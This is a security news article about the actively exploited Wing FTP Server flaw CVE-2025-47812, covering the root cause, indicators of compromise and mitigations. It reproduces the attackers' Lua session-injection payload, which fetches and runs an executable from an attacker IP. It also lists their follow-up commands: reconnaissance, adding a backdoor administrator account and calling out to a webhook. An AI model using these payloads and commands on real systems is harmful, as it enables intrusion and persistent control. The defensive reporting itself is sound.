A newly discovered critical vulnerability is currently being actively exploited across thousands of publicly accessible servers. Identified as CVE-2025-47812 with a maximum CVSS score of 10.0, this flaw affects Wing FTP Server, a widely used cross-platform file transfer solution. The vulnerability allows remote attackers to inject arbitrary Lua codeinto server session files through manipulated login parameters. Once saved, the malicious code is automatically executed with root or SYSTEM-level privileges upon a regular page request. G.Business reports this, citing analyses by Huntress and The Hacker News.
Root Cause and Attack Vector
The vulnerability arises from improper handling of null bytes (\0) in the username field submitted to the web interface's loginok.html endpoint. By terminating the string early using %00, attackers can append executable Lua code that gets written to session files. Since these .lua session files are deserialized by default when accessing internal pages (e.g. dir.html), any injected code is immediately executed by the server process.
Exploitation in the Wild: Tactics and Commands
Security firm Huntress observed the first exploit attempts on July 1, 2025, just one day after public disclosure. The following tactics were documented:
Session Injection Payload (Lua Example):
luaKopierenBearbeiten_SESSION['username']=[[anonymous]]
local function hx(s)
return (s:gsub('..', function(x) return string.char(tonumber(x,16)) end))
end
local cmd = hx("636572747574696c202d6620687474703a2f2f185.196.9.225:8080/payload.exe")
local h = io.popen(cmd)
local r = h:read("*a")
h:close()
--]]
Decoded system command:
cmdKopierenBearbeitencertutil -urlcache -f http://185.196.9.225:8080/payload.exe %TEMP%\malware.exe
start /B %TEMP%\malware.exe
Commands Run by Attackers (Observed Behavior)
After gaining code execution, attackers performed:
System Reconnaissance:
cmdKopierenBearbeitenwhoami
ipconfig
nslookup
arp -a
User Enumeration and Backdoor Setup:
cmdKopierenBearbeitennet user wingftp 123123qweqwe /add
net localgroup administrators wingftp /add
Network Test and Payload Retrieval:
cmdKopierenBearbeitencurl -s -d con https://webhook.site/5d112487... > nul
powershell -c get-childitem c: | out-file c:\dir.txt
MSI-based Tool Deployment:
Attackers downloaded ScreenConnect installers using Lua-encoded scripts.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| IP Addresses | 185.196.9.225, 223.160.131.104, 149.248.44.88 |
| Malicious URL | http://185.196.9.225:8080/EOp45eWLSp5G5Uwp_yOCiQ |
| SHA256 | c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4 |
| Webhook | https://webhook.site/5d112487-6133-4942-ac87-3f473d44bd81 |
| Usernames | wing, wingftp |
| Passwords | 123123qweqwe, 123123qweqweqwe |
Files and Logs to Inspect
Suspicious .lua Session Files:
Location:
pgsqlKopierenBearbeitenC:\Program Files (x86)\Wing FTP Server\session\
Look for:
- Lua files larger than 1 KB
- Code with
io.popen,hx(), or embedded hex blobs
Log Entry Example (Truncated Username):
Location:
mathematicaKopierenBearbeitenC:\Program Files (x86)\Wing FTP Server\Log\Domains\<yourdomain>\
Log entry:
rustKopierenBearbeitenUser 'anonymous
This indicates that the username was cut off due to null-byte termination.
Affected Versions and Patch Status
All versions of Wing FTP Server prior to 7.4.4 are affected. Version 7.4.4 was released on May 14, 2025, and includes a fix for CVE-2025-47812. However, thousands of instances remain unpatched, particularly in environments where automated updates are disabled.
Mitigation Steps for System Administrators
- Patch Immediately
Upgrade to Wing FTP Server v7.4.4 or later. - Inspect Session Files
Look for.luafiles containing suspicious embedded logic. - Disable Anonymous FTP Access
Unless explicitly needed for public services. - Restrict Web Interface
Use firewalls or VPN to protect the HTTP/HTTPS interface. - Search for Backdoor Accounts
Check forwing,wingftpusers created recently. - Review Logs for Truncated Login Entries
User 'anonymous(without closing quote) indicates null-byte abuse.
Security Best Practices
| Area | Recommendation |
|---|---|
| Web Access | Restrict interface to internal network or VPN |
| Log Monitoring | Enable SIEM rules for session and log directories |
| File Integrity | Monitor session files for changes or Lua logic |
| Threat Intel | Block known IPs and payload URLs at firewall |
| User Management | Audit all FTP users for unexpected accounts |
Global Exposure
Based on Censys data:
- Over 8,000 Wing FTP servers are publicly accessible.
- Over 5,000 expose their web interface.
- Affected countries include the United States, Germany, UK, India, China.
The simplicity of the exploit, combined with high privilege access and a wide attack surface, places many organizations — particularly small hosting providers and mid-sized enterprises — at high risk.
CVE-2025-47812 represents a critical and actively exploited threat vector that requires immediate attention. The combination of unauthenticated access, automatic Lua code execution, and persistent control via backdoor creationmakes this vulnerability one of the most severe seen in a production FTP solution in recent years.
Organizations using Wing FTP Server should patch immediately, audit logs and session files, and implement long-term access controls to prevent similar exploits in the future.
Stay connected for news that works — timely, factual, and free from opinion. Learn more about this topic and related developments here: chwoot: he sudo flaw that turns local Linux users into root – in seconds